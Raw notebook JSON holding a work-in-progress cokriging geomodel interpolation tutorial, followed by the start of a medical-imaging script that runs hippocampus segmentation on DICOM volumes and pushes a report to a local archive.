"## Simple example: 4 points, one gradient\n\nWe first start with a very simple example: twi interfaces iwth two points each, and one common gradient.\n\n<div class=\"alert alert-info\">\n <strong>To do:</strong> Include sketch of points and gradient.\n</div>",
"_____no_output_____"
]
],
[
[
"# interface points:\n# interface 1:\nx1 = [0,0]\nx2 = [1,0]\nx_int1 = np.vstack([x1,x2])\n# interface 2:\nx3 = [0,1]\nx4 = [1,1]\nx_int2 = np.vstack([x3,x4])\n# orientation point:\nx5 = [0,0.5]\nx = np.vstack([x1, x2, x3, x4, x5])\n# orientation values\ngx5 = 1.\ngy5 = 1.",
"_____no_output_____"
],
[
"plt.plot(x_int1[:,0], x_int1[:,1], 'ro')\nplt.plot(x_int2[:,0], x_int2[:,1], 'bo')\nplt.plot(x5[0], x5[1], 'go')",
"_____no_output_____"
]
],
[
[
"### Calculate distance matrix\n\n(Note: not required anymore for this implementation - as h-vectors used...)\n",
"_____no_output_____"
]
],
[
[
"import scipy.spatial.distance as dist\n",
"_____no_output_____"
],
[
"d = dist.squareform(dist.pdist(x))",
"_____no_output_____"
],
[
"d[1,0], d[0,1]",
"_____no_output_____"
],
[
"x[:2], x[1] - x[0]",
"_____no_output_____"
]
],
[
[
"### Set up K matrix\n\nWe follow the K-matrix setup described in the Appendix of Lajaunie et al. (pg. 584):\n\nNote: we have to use the spacing vector $\\vec{h}$ instead of simply the (radial) distance $r$ in order to get correctly calculated covariance values:",
"_____no_output_____"
]
],
[
[
"# Previous implementation:\n# K = np.array([[K_Gx(d[4,4]), K_GxGy(d[4,4]), K_ZGx(d[4,0])-K_ZGx(d[4,1]), K_ZGx(d[4,2])-K_ZGx(d[4,3])],\n# [K_GxGy(d[4,4]), K_Gy(d[4,4]), K_ZGy(d[4,0])-K_ZGy(d[4,1]), K_ZGy(d[4,2])-K_ZGy(d[4,3])],\n# [K_ZGx(d[0,4])-K_ZGx(d[1,4]), K_Gy(d[0,4])-K_ZGy(d[1,4]), K_Z(d[0,0])-K_Z(d[0,1])-K_Z(d[1,0])+K_Z(d[1,1]), K_Z(d[0,2])-K_Z(d[0,3])-K_Z(d[1,2])+K_Z(d[1,3])],\n# [K_ZGx(d[0,4])-K_ZGx(d[1,4]), K_Gy(d[0,4])-K_ZGy(d[1,4]), K_Z(d[0,0])-K_Z(d[0,1])-K_Z(d[1,0])+K_Z(d[1,1]), K_Z(d[0,2])-K_Z(d[0,3])-K_Z(d[1,2])+K_Z(d[1,3])]])\n\nK = np.array([[K_Gx(x[4]-x[4]), K_GxGy(x[4]-x[4]), K_ZGx(x[4]-x[0])-K_ZGx(x[4]-x[1]), K_ZGx(x[4]-x[2])-K_ZGx(x[4]-x[3])],\n [K_GxGy(x[4]-x[4]), K_Gy(x[4]-x[4]), K_ZGy(x[4]-x[0])-K_ZGy(x[4]-x[1]), K_ZGy(x[4]-x[2])-K_ZGy(x[4]-x[3])],\n [K_ZGx(x[0]-x[4])-K_ZGx(x[1]-x[4]), K_ZGy(x[0]-x[4])-K_ZGy(x[1]-x[4]), K_Z(x[0]-x[0])-K_Z(x[0]-x[1])-K_Z(x[1]-x[0])+K_Z(x[1]-x[1]), K_Z(x[0]-x[2])-K_Z(x[0]-x[3])-K_Z(x[1]-x[2])+K_Z(x[1]-x[3])],\n [K_ZGx(x[2]-x[4])-K_ZGx(x[3]-x[4]), K_ZGy(x[2]-x[4])-K_ZGy(x[3]-x[4]), K_Z(x[2]-x[0])-K_Z(x[2]-x[1])-K_Z(x[3]-x[0])+K_Z(x[3]-x[1]), K_Z(x[2]-x[2])-K_Z(x[2]-x[3])-K_Z(x[3]-x[2])+K_Z(x[3]-x[3])]])",
"_____no_output_____"
],
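[
"# Editor's note (hedged): a quick numerical illustration of why the separation\n# *vector* h matters -- the cross-covariance K_ZGx is odd in h_x, so h and -h\n# give values of equal magnitude and opposite sign, information that a purely\n# radial distance r would destroy. Uses the cubic covariance defined above.\nh = np.array([0.5, 0.])\nprint(K_ZGx(h), K_ZGx(-h))",
"_____no_output_____"
],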
[
"x[0]",
"_____no_output_____"
],
[
"K",
"_____no_output_____"
],
[
"np.linalg.cond(K)",
"_____no_output_____"
],
[
"np.linalg.inv(K)",
"_____no_output_____"
]
],
[
[
"Ok, this first step looks reasonable now. Theoretically, we could now solve the kriging system without the universality conditions:",
"_____no_output_____"
]
],
[
[
"# setting up the RHS - only gradient in x,y directions:\nb = [gx5,gy5,0,0]",
"_____no_output_____"
],
[
"w = np.linalg.solve(K, b)\nprint(w)",
"[ 3. 2.60865758 1.89025774 -1.89025774]\n"
]
],
[
[
"Ok, weights are large - let's see what we actually interpolate - in writing the interpolator function (1) without a drift term:\n\n$$Z(x_\\alpha)^K = a_5 K_{ZG^x}^{\\alpha 5} + b_5 K_{ZG^y}^{\\alpha 5} + c_{12}(K_Z^{\\alpha 1} - K_Z^{\\alpha 2})\n+ c_{34}(K_Z^{\\alpha 3} - K_Z^{\\alpha 4})$$",
"_____no_output_____"
]
],
[
[
"def interp_val(xa, w, x):\n \"\"\"Determine interpolation for scalar field value (without drift)\n \n Parameters:\n xa = [x,y]: x-vector to point of estimation\n w = [a,b,c1,c2]: estimnated weights\n x = (n,2)-vector of known value positions\n \"\"\"\n return w[0]*K_ZGx(xa - x[4]) + \\\n w[1]*K_ZGy(xa - x[4]) + \\\n w[2]*(K_Z(xa-x[0])-K_Z(xa-x[1])) + \\\n w[3]*(K_Z(xa-x[2])-K_Z(xa-x[3]))\n ",
"_____no_output_____"
],
[
"interp_val([2,3], w, x)",
"_____no_output_____"
]
],
[
[
"And in a map-view:",
"_____no_output_____"
]
],
[
[
"# create points:\nxx = np.arange(-.5,1.5,0.1)\nyy = np.arange(-.5,1.5,0.1)\nXX,YY = np.meshgrid(xx,yy)",
"_____no_output_____"
],
[
"scalar_field_no_drift = np.empty((len(xx), len(yy)))\nfor i,xxx in enumerate(xx):\n for j,yyy in enumerate(yy):\n scalar_field_no_drift[i,j] = interp_val([xxx,yyy], w, x)",
"_____no_output_____"
],
[
"plt.contour(XX, YY, scalar_field_no_drift.T, 20)\nplt.colorbar()\nplt.plot(x_int1[:,0], x_int1[:,1], 'ro')\nplt.plot(x_int2[:,0], x_int2[:,1], 'bo')\nplt.plot(x5[0], x5[1], 'go')\nplt.axis('equal')",
"_____no_output_____"
]
],
[
[
"\n<div class=\"alert alert-danger\">\n <strong>Check:</strong> The result obviously does not make sense... is this because of the missing drift or is it a problem in the implementation?\n</div>\n\n",
"_____no_output_____"
],
[
"## Adding universal kriging terms\n\nWe now add the universal kriging terms in order to obtain a meaningful drift/ variability in the interpolated scalar field. How these additional terms are included is not so directly obvious from Lajaunie et al., but the description in the appendix for a second-order drift provides some insight.\n\n\n<div class=\"alert alert-info\">\n <strong>To do:</strong> Include more information - and reference to gempy paper?\n</div>\n\n### Set up F-matrix",
"_____no_output_____"
]
],
[
[
"# new 25.11.2019\nF = np.array([[1, 0, 1, 1],\n [0, 1, 0, 0]])",
"_____no_output_____"
]
],
[
[
"Combine matrices:",
"_____no_output_____"
]
],
[
[
"A = np.hstack([K, F.transpose()])\nB = np.hstack([F, np.zeros((2,2))])\nkrig_full = np.vstack([A,B])",
"_____no_output_____"
],
[
"krig_full, krig_full.shape",
"_____no_output_____"
],
[
"b = np.zeros(6)\nb[0] = gx5\nb[1] = gy5",
"_____no_output_____"
],
[
"w = np.linalg.solve(krig_full, b)\nw",
"_____no_output_____"
]
],
[
[
"### Interpolation function with universal drift\n\n",
"_____no_output_____"
]
],
[
[
"def interp_val_with_drift(xa, w, x):\n \"\"\"Determine interpolation for scalar field value\n \n Parameters:\n xa = [x,y]: x-vector to point of estimation\n w = [a,b,c1,c2]: estimnated weights\n x = (n,2)-vector of known value positions\n \"\"\"\n return w[0]*K_ZGx(xa - x[4]) + \\\n w[1]*K_ZGy(xa - x[4]) + \\\n w[2]*(K_Z(xa-x[0])-K_Z(xa-x[1])) + \\\n w[3]*(K_Z(xa-x[2])-K_Z(xa-x[3])) + \\\n w[4]*xa[0] + w[5]*xa[1]\n ",
"_____no_output_____"
],
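[
"# Editor's check (hedged): the co-kriging system interpolates the gradient\n# data, so the drift-aware interpolant should reproduce the supplied gradient\n# at x5. Estimate it by central differences; a mismatch would point at a sign\n# or covariance problem (cf. the debugging section further below).\neps = 1e-5\ngx = (interp_val_with_drift([x5[0]+eps, x5[1]], w, x) - interp_val_with_drift([x5[0]-eps, x5[1]], w, x))/(2*eps)\ngy = (interp_val_with_drift([x5[0], x5[1]+eps], w, x) - interp_val_with_drift([x5[0], x5[1]-eps], w, x))/(2*eps)\nprint(gx, gy)   # compare against (gx5, gy5) = (1., 1.)",
"_____no_output_____"
],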
[
"# create points:\nxx = np.arange(-.5,1.5,0.1)\nyy = np.arange(-.5,1.5,0.1)\nXX,YY = np.meshgrid(xx,yy)",
"_____no_output_____"
],
[
"scalar_field_no_drift = np.empty((len(xx), len(yy)))\nfor i,xxx in enumerate(xx):\n for j,yyy in enumerate(yy):\n scalar_field_no_drift[i,j] = interp_val_with_drift([xxx,yyy], w, x)",
"_____no_output_____"
],
[
"plt.contour(XX, YY, scalar_field_no_drift.T, 20)\nplt.colorbar()\nplt.plot(x_int1[:,0], x_int1[:,1], 'ro')\nplt.plot(x_int2[:,0], x_int2[:,1], 'bo')\nplt.plot(x5[0], x5[1], 'go')\nplt.axis('equal')",
"_____no_output_____"
]
],
[
[
"# Old below",
"_____no_output_____"
]
],
[
[
"K",
"_____no_output_____"
],
[
"x",
"_____no_output_____"
],
[
"x_all = x\nF = np.array([[1, 0, x_all[0,0]-x_all[1,0], x_all[2,0]-x_all[3,0]],\n [0, 1, x_all[0,1]-x_all[1,1], x_all[2,1]-x_all[3,1]],\n [2*x_all[4,0], 0, x_all[0,0]**2-x_all[1,0]**2, x_all[2,0]**2-x_all[3,0]**2],\n [0, 2*x_all[4,1], x_all[0,1]**2-x_all[1,1]**2, x_all[2,1]**2-x_all[3,1]**2],\n [x_all[4,1], x_all[4,0], x_all[0,0]*x_all[0,1]-x_all[1,0]*x_all[1,1], x_all[2,0]*x_all[2,1]-x_all[3,0]*x_all[3,1]]])",
"_____no_output_____"
],
[
"F",
"_____no_output_____"
]
],
[
[
"### Combine in full matrix",
"_____no_output_____"
]
],
[
[
"A = np.hstack([K, F.transpose()])\nB = np.hstack([F, np.zeros((5,5))])\nkrig_full = np.vstack([A,B])",
"_____no_output_____"
],
[
"krig_full, krig_full.shape",
"_____no_output_____"
]
],
[
[
"### Set up b-vector (RHS)",
"_____no_output_____"
]
],
[
[
"b = np.zeros(9)\nb[0] = gx5\nb[1] = gy5",
"_____no_output_____"
],
[
"b",
"_____no_output_____"
]
],
[
[
"### Solve system of algebraic equations",
"_____no_output_____"
]
],
[
[
"np.linalg.solve(krig_full, b)",
"_____no_output_____"
]
],
[
[
"Bam!",
"_____no_output_____"
]
],
[
[
"np.linalg.inv(K)",
"_____no_output_____"
],
[
"krig_full.shape",
"_____no_output_____"
]
],
[
[
"Why is the inversion failing? Problem with the setup of the universal part (I assume)? Or is the point configuration too similar?\n\nApproach: try pseudo-inverse instead:",
"_____no_output_____"
]
],
[
[
"weights = np.dot(np.linalg.pinv(krig_full), b)",
"_____no_output_____"
],
[
"weights",
"_____no_output_____"
]
],
[
[
"Hmmm... some values are very small - no contribution from the gradients, especially... basically, only the drift values are considered?\n\nLet's see: interpolate!\n\nThe weight vector now contains the parameters: $w = [a_5, b_5, c_{12}, c_{34}, d_1, d_2, d_3, d_4, d_5]$. \n\nIn our example (at the moment), the solution seems to be completely determined by the drift value.",
"_____no_output_____"
],
[
"### Interpolate values\n\nUse equation (1) on page 577 from Lajaune et al.:\n\n$$Z(x_\\alpha)^K = a_5 K_{ZG^x}^{\\alpha 5} + b_5 K_{ZG^y}^{\\alpha 5} + c_{12}(K_Z^{\\alpha 1} - K_Z^{\\alpha 2})\n+ c_{34}(K_Z^{\\alpha 3} - K_Z^{\\alpha 4}) + d_1$$\n\n\n",
"_____no_output_____"
]
],
[
[
"x_alpha = [2,2]\n",
"_____no_output_____"
],
[
"interp_val(x_alpha, weights, x_all)",
"_____no_output_____"
]
],
[
[
"### Combined in one function\n\nFor better testing purposes, here the model generation in a class definition:",
"_____no_output_____"
]
],
[
[
"class GeomodelCokriging(object):\n \n def __init__(self):\n \"\"\"Two-dimensional geomodel interpolation using the potential-field approach\n \n Note: only for instructive purposes - for a real model, please use GemPy!\n \"\"\"\n # set covariance model range:\n self.a = 5.\n\n def K_Z(self, h):\n r = np.sqrt(h[0]**2 + h[1]**2)\n return np.exp(-(r/self.a)**2)\n\n # cross-cov space-grad\n def K_ZGx(self, h):\n \"\"\"Note: requires the vector h!\"\"\"\n # r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n return -2 * hx/self.a**2 * self.K_Z(h) \n\n def K_ZGy(self, h):\n \"\"\"Note: requires the vector h!\"\"\"\n # r = np.sqrt(h[0]**2 + h[1]**2)\n hy = h[1] \n return -2 * hy/self.a**2 * self.K_Z(h) \n\n # cov grad\n def K_Gx(self, h):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n return (2/self.a**2 - 4 * hx**2/self.a**4) * self.K_Z(h) \n\n def K_Gy(self, h):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hy = h[1]\n return (2/self.a**2 - 4 * hy**2/self.a**4) * self.K_Z(h) \n\n # cross-cov grad\n def K_GxGy(self, h):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n hy = h[1]\n return -4 * hx * hy /self.a**4 * self.K_Z(h) \n\n def set_points(self, points):\n \"\"\"Define points for interfaces, pass as dictionary\n \n points = 1 : [x1, x2], 2: [x3, x4]}\n \"\"\"\n self.points = points\n \n def set_ori(self, ori):\n \"\"\"Set position and gradient of orientation\n \n ori = {'pos' : x5, 'grads' : [gx5, gy5]}\n \"\"\"\n self.ori = ori\n \n def setup_K_matrix(self):\n x = np.vstack([self.points[1], self.points[2], self.ori['pos']])\n self.K = np.array([\n [self.K_Gx(x[4]-x[4]), self.K_GxGy(x[4]-x[4]), self.K_ZGx(x[4]-x[0])-self.K_ZGx(x[4]-x[1]), self.K_ZGx(x[4]-x[2])-self.K_ZGx(x[4]-x[3])],\n [self.K_GxGy(x[4]-x[4]), self.K_Gy(x[4]-x[4]), self.K_ZGy(x[4]-x[0])-self.K_ZGy(x[4]-x[1]), self.K_ZGy(x[4]-x[2])-self.K_ZGy(x[4]-x[3])],\n [self.K_ZGx(x[0]-x[4])-self.K_ZGx(x[1]-x[4]), self.K_ZGy(x[0]-x[4])-self.K_ZGy(x[1]-x[4]), self.K_Z(x[0]-x[0])-self.K_Z(x[0]-x[1])-self.K_Z(x[1]-x[0])+self.K_Z(x[1]-x[1]), self.K_Z(x[0]-x[2])-self.K_Z(x[0]-x[3])-self.K_Z(x[1]-x[2])+self.K_Z(x[1]-x[3])],\n [self.K_ZGx(x[2]-x[4])-self.K_ZGx(x[3]-x[4]), self.K_ZGy(x[2]-x[4])-self.K_ZGy(x[3]-x[4]), self.K_Z(x[2]-x[0])-self.K_Z(x[2]-x[1])-self.K_Z(x[3]-x[0])+self.K_Z(x[3]-x[1]), self.K_Z(x[2]-x[2])-self.K_Z(x[2]-x[3])-self.K_Z(x[3]-x[2])+self.K_Z(x[3]-x[3])]])\n # magic miguel fix:\n # self.K[0,0] = 1./3.\n # self.K[1,1] = 1./3.\n \n \n def setup_RHS(self):\n # setting up the RHS - only gradient in x,y directions:\n self.b = [self.ori['grads'][0],self.ori['grads'][1],0,0]\n \n def solve(self):\n self.setup_K_matrix()\n self.setup_RHS()\n self.w = np.linalg.solve(self.K, self.b)\n \n def interp_val(self, xa, w, x):\n \"\"\"Determine interpolation for scalar field value (without drift)\n\n Parameters:\n xa = [x,y]: x-vector to point of estimation\n w = [a,b,c1,c2]: estimnated weights\n x = (n,2)-vector of known value positions\n \n bla\n \"\"\"\n val = w[0]*K_ZGx(xa - x[4]) + \\\n w[1]*K_ZGy(xa - x[4])# + \\\n# w[2]*(K_Z(xa-x[0])-K_Z(xa-x[1])) + \\\n# w[3]*(K_Z(xa-x[2])-K_Z(xa-x[3]))\n return val\n\n\n def plot(self):\n \"\"\"Plot points and interpolated field\"\"\"\n # create points:\n xx = np.arange(-.5,1.5,0.1)\n yy = np.arange(-.5,1.5,0.1)\n XX,YY = np.meshgrid(xx,yy)\n scalar_field_no_drift = np.empty((len(xx), len(yy)))\n for i,xxx in enumerate(xx):\n for j,yyy in enumerate(yy):\n scalar_field_no_drift[i,j] = 
self.interp_val([xxx,yyy], self.w, x)\n \n # create plot\n plt.contour(XX, YY, scalar_field_no_drift.T, 20)\n plt.colorbar()\n plt.plot(self.points[1][:,0], self.points[1][:,1], 'ro')\n plt.plot(self.points[2][:,0], self.points[2][:,1], 'bo')\n plt.plot(self.ori['pos'][0], self.ori['pos'][1], 'go')",
"_____no_output_____"
],
[
"points = {1 : np.array([x1, x2]), 2: np.array([x3, x4])}\nori = {'pos' : x5, 'grads' : [1., 1.]}\ngeomodel = GeomodelCokriging()",
"_____no_output_____"
],
[
"geomodel.set_points(points)\ngeomodel.set_ori(ori)",
"_____no_output_____"
],
[
"geomodel.solve()",
"_____no_output_____"
],
[
"geomodel.plot()",
"_____no_output_____"
],
[
"help(geomodel.interp_val)",
"_____no_output_____"
]
],
[
[
"Test different range values:",
"_____no_output_____"
]
],
[
[
"geomodel.a = 5.\ngeomodel.solve()\ngeomodel.plot()",
"_____no_output_____"
]
],
[
[
"Interesting... the gradient seems to be influenced too much by the covariance function!",
"_____no_output_____"
]
],
[
[
"geomodel.K",
"_____no_output_____"
],
[
"geomodel.K[0,0] = 1./3.\ngeomodel.K[1,1] = 1./3.",
"_____no_output_____"
],
[
"geomodel.solve()\ngeomodel.plot()",
"_____no_output_____"
],
[
"geomodel.K",
"_____no_output_____"
]
],
[
[
"## Debugging cokriging\n",
"_____no_output_____"
]
],
[
[
"points = {1 : np.array([x1, x2]), 2: np.array([x3, x4])}\nori = {'pos' : x5, 'grads' : [10., 1.]}\ngeomodel = GeomodelCokriging()\ngeomodel.set_points(points)\ngeomodel.set_ori(ori)\ngeomodel.solve()\ngeomodel.K = geomodel.K[:2,:2]\ngeomodel.b = geomodel.b[:2]",
"_____no_output_____"
],
[
"geomodel.w = np.linalg.solve(geomodel.K, geomodel.b)",
"_____no_output_____"
],
[
"geomodel.plot()",
"_____no_output_____"
],
[
"geomodel.w",
"_____no_output_____"
],
[
"rs = np.arange(0.01,3,0.01)\nhs = np.vstack([rs, np.zeros_like(rs)]).transpose()\nplt.plot(rs, [K_Gx(h) for h in hs], label='K_Gx')\nplt.plot(rs, [K_Gy(h) for h in hs], label='K_Gy')\nplt.legend()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
e7092c5df433d420c064f0e284a71e4e1c9c49eb | 201,779 | ipynb | Jupyter Notebook | section3/src/inference_dcm.ipynb | iDataist/Hippocampal_Volume_Quantification_in_Alzheimer-s_Progression | 803f079b1feb6aadd8e305eba507a23bda03ab69 | [
"MIT"
] | 2 | 2020-06-23T20:01:30.000Z | 2020-08-11T02:53:07.000Z | section3/src/inference_dcm.ipynb | iDataist/Hippocampal_Volume_Quantification_in_Alzheimer-s_Progression | 803f079b1feb6aadd8e305eba507a23bda03ab69 | [
"MIT"
] | null | null | null | section3/src/inference_dcm.ipynb | iDataist/Hippocampal_Volume_Quantification_in_Alzheimer-s_Progression | 803f079b1feb6aadd8e305eba507a23bda03ab69 | [
"MIT"
] | 2 | 2020-07-19T17:04:49.000Z | 2020-08-27T10:55:45.000Z | 397.986193 | 152,516 | 0.923798 | [
[
[
"\"\"\"\nHere we do inference on a DICOM volume, constructing the volume first, and then sending it to the\nclinical archive\n\nThis code will do the following:\n 1. Identify the series to run HippoCrop.AI algorithm on from a folder containing multiple studies\n 2. Construct a NumPy volume from a set of DICOM files\n 3. Run inference on the constructed volume\n 4. Create report from the inference\n 5. Call a shell script to push report to the storage archive\n\"\"\"\n\nimport os\nimport sys\nimport datetime\nimport time\nimport shutil\nimport subprocess\n\nimport numpy as np\nimport pydicom\n\nfrom PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\n\nfrom inference.UNetInferenceAgent import UNetInferenceAgent\n\ndef load_dicom_volume_as_numpy_from_list(dcmlist):\n \"\"\"Loads a list of PyDicom objects a Numpy array.\n Assumes that only one series is in the array\n\n Arguments:\n dcmlist {list of PyDicom objects} -- path to directory\n\n Returns:\n tuple of (3D volume, header of the 1st image)\n \"\"\"\n\n slices = [np.flip(dcm.pixel_array).T for dcm in sorted(dcmlist, key=lambda dcm: dcm.InstanceNumber)]\n\n hdr = dcmlist[0]\n\n # zero-out Pixel Data since the users of this function are only interested in metadata\n hdr.PixelData = None\n return (np.stack(slices, 2), hdr)\n\ndef get_predicted_volumes(pred):\n \"\"\"Gets volumes of two hippocampal structures from the predicted array\n\n Arguments:\n pred {Numpy array} -- array with labels. Assuming 0 is bg, 1 is anterior, 2 is posterior\n\n Returns:\n A dictionary with respective volumes\n \"\"\"\n volume_ant = np.sum(pred == 1)\n volume_post = np.sum(pred == 2)\n total_volume = np.sum(pred > 0)\n return {\"anterior\": volume_ant, \"posterior\": volume_post, \"total\": total_volume}\n\ndef create_report(inference, header, orig_vol, pred_vol):\n \"\"\"Generates an image with inference report\n\n Arguments:\n inference {Dictionary} -- dict containing anterior, posterior and full volume values\n header {PyDicom Dataset} -- DICOM header\n orig_vol {Numpy array} -- original volume\n pred_vol {Numpy array} -- predicted label\n\n Returns:\n PIL image\n \"\"\"\n\n # The code below uses PIL image library to compose an RGB image that will go into the report\n # A standard way of storing measurement data in DICOM archives is creating such report and\n # sending them on as Secondary Capture IODs (http://dicom.nema.org/medical/dicom/current/output/chtml/part03/sect_A.8.html)\n # Essentially, the report is just a standard RGB image, with some metadata, packed into \n # DICOM format. \n\n pimg = Image.new(\"RGB\", (1000, 1000))\n draw = ImageDraw.Draw(pimg)\n\n header_font = ImageFont.truetype(\"assets/Roboto-Regular.ttf\", size=40)\n main_font = ImageFont.truetype(\"assets/Roboto-Regular.ttf\", size=20)\n\n# slice_nums = [orig_vol.shape[2]//3, orig_vol.shape[2]//2, orig_vol.shape[2]*3//4] \n\n # Create the report and show information relevant to clinicians. 
\n\n    draw.text((50, 50), \"HippoVolume.AI\", (255, 255, 255), font=header_font)\n    draw.multiline_text((50, 140),\n f\"Patient ID: {header.PatientID} \\n \\\n Study Description : {header.StudyDescription}\\n \\\n Series Description: {header.SeriesDescription}\\n \\\n Modality: {header.Modality}\\n \\\n Image Type: {header.ImageType}\\n \\\n Anterior Volume: {inference['anterior']}\\n \\\n Posterior Volume: {inference['posterior']}\\n \\\n Total Volume: {inference['total']}\\n\", \n (255, 255, 255), font=main_font)\n\n # Create a PIL image from array:\n # Numpy array needs to be flipped, transposed and normalized to a matrix of values in the range of [0..255]\n nd_orig = np.flip((orig_vol[0, :, :]/np.max(orig_vol[0, :, :]))*0xff).T.astype(np.uint8)\n # create a PIL image from numpy array\n pil_orig = Image.fromarray(nd_orig, mode=\"L\").convert(\"RGBA\").resize((400, 400))\n # paste the PIL image into the main report image object (pimg)\n pimg.paste(pil_orig, box=(50, 500))\n \n nd_pred = np.flip((pred_vol[0, :, :]/np.max(pred_vol[0, :, :]))*0xff).T.astype(np.uint8)\n # create a PIL image from numpy array\n pil_pred = Image.fromarray(nd_pred, mode=\"L\").convert(\"RGBA\").resize((400, 400))\n # paste the PIL image into the main report image object (pimg)\n pimg.paste(pil_pred, box=(550, 500))\n\n return pimg\n\ndef save_report_as_dcm(header, report, path):\n \"\"\"Writes the supplied image as a DICOM Secondary Capture file\n\n Arguments:\n header {PyDicom Dataset} -- original DICOM file header\n report {PIL image} -- image representing the report\n path {Where to save the report}\n\n Returns:\n N/A\n \"\"\"\n\n # create a DICOM Secondary Capture instance that will be correctly interpreted by most imaging viewers including OHIF\n # Set up DICOM metadata fields. Most of them will be the same as original file header\n out = pydicom.Dataset(header)\n\n out.file_meta = pydicom.Dataset()\n out.file_meta.TransferSyntaxUID = pydicom.uid.ExplicitVRLittleEndian\n\n out.is_little_endian = True\n out.is_implicit_VR = False\n\n # change class to Secondary Capture\n out.SOPClassUID = \"1.2.840.10008.5.1.4.1.1.7\"\n out.file_meta.MediaStorageSOPClassUID = out.SOPClassUID\n\n # The report is a separate image series of one image\n out.SeriesInstanceUID = pydicom.uid.generate_uid()\n out.SOPInstanceUID = pydicom.uid.generate_uid()\n out.file_meta.MediaStorageSOPInstanceUID = out.SOPInstanceUID\n out.Modality = \"OT\" \n out.SeriesDescription = \"HippoVolume.AI\"\n\n out.Rows = report.height\n out.Columns = report.width\n\n out.ImageType = r\"DERIVED\\PRIMARY\\AXIAL\" # deriving this image from patient data\n out.SamplesPerPixel = 3 # building an RGB image.\n out.PhotometricInterpretation = \"RGB\"\n out.PlanarConfiguration = 0 # bytes encode pixels as R1G1B1R2G2B2... as opposed to R1R2R3...G1G2G3...\n out.BitsAllocated = 8 # using 8 bits/pixel\n out.BitsStored = 8\n out.HighBit = 7\n out.PixelRepresentation = 0\n\n # Set time and date\n dt = datetime.date.today().strftime(\"%Y%m%d\")\n tm = datetime.datetime.now().strftime(\"%H%M%S\")\n out.StudyDate = dt\n out.StudyTime = tm\n out.SeriesDate = dt\n out.SeriesTime = tm\n\n out.ImagesInAcquisition = 1\n\n # empty these since most viewers will then default to auto W/L\n out.WindowCenter = \"\"\n out.WindowWidth = \"\"\n\n # Data imprinted directly into image pixels is called \"burned in annotation\"\n out.BurnedInAnnotation = \"YES\"\n\n out.PixelData = report.tobytes()\n\n pydicom.filewriter.dcmwrite(path, out, write_like_original=False)\n \n# path = '../TestVolumes'\ndef get_series_for_inference(path):\n \"\"\"Reads multiple series from one folder and picks the one\n to run inference on.\n\n Arguments:\n path {string} -- location of the DICOM files\n\n Returns:\n Numpy array representing the series\n \"\"\"\n\n series_path = [dir for dir, subdirs, files in os.walk(path) if 'HCropVolume' in dir]\n chosen_path = np.random.choice(series_path) \n series_for_inference = [pydicom.dcmread(os.path.join(chosen_path, f)) for f in os.listdir(chosen_path)]\n\n # Check if there is more than one series (using a set comprehension).\n if len({f.SeriesInstanceUID for f in series_for_inference}) != 1:\n print(\"Error: can not figure out what series to run inference on\")\n return []\n\n return series_for_inference\n\ndef os_command(command):\n # Comment this if running under Windows\n sp = subprocess.Popen([\"/bin/bash\", \"-i\", \"-c\", command])\n sp.communicate()\n\n # Uncomment this if running under Windows\n # os.system(command)\n\nif __name__ == \"__main__\":\n # This code expects a single command line argument with link to the directory containing\n # routed studies\n if len(sys.argv) != 2:\n print(\"You should supply one command line argument pointing to the routing folder. Exiting.\")\n sys.exit()\n\n # Find all subdirectories within the supplied directory. We assume that \n # one subdirectory contains a full study\n subdirs = [os.path.join(sys.argv[1], d) for d in os.listdir(sys.argv[1]) if\n os.path.isdir(os.path.join(sys.argv[1], d))]\n\n # Get the latest directory\n study_dir = sorted(subdirs, key=lambda dir: os.stat(dir).st_mtime, reverse=True)[0]\n\n print(f\"Looking for series to run inference on in directory {study_dir}...\")\n\n volume, header = load_dicom_volume_as_numpy_from_list(get_series_for_inference(study_dir))\n print(f\"Found series of {volume.shape[2]} axial slices\")\n\n print(\"HippoVolume.AI: Running inference...\")\n # Use the UNetInferenceAgent class and model parameter file from the previous section\n inference_agent = UNetInferenceAgent(\n device=\"cpu\",\n parameter_file_path=r\"\")\n\n # Run inference\n pred_label = inference_agent.single_volume_inference_unpadded(np.array(volume))\n pred_volumes = get_predicted_volumes(pred_label)\n\n # Create and save the report\n print(\"Creating and pushing report...\")\n report_save_path = r\"../out/report.dcm\"\n report_img = create_report(pred_volumes, header, volume, pred_label)\n save_report_as_dcm(header, report_img, report_save_path)\n\n # Send report to the storage archive\n os_command(\"sudo storescu localhost 4242 -v -aec HIPPOAI +r +sd ../out/report.dcm\")\n\n # remove the study dir if run as root user\n # sleep to let the StoreSCP server process the report \n # the main archive is routing everything that 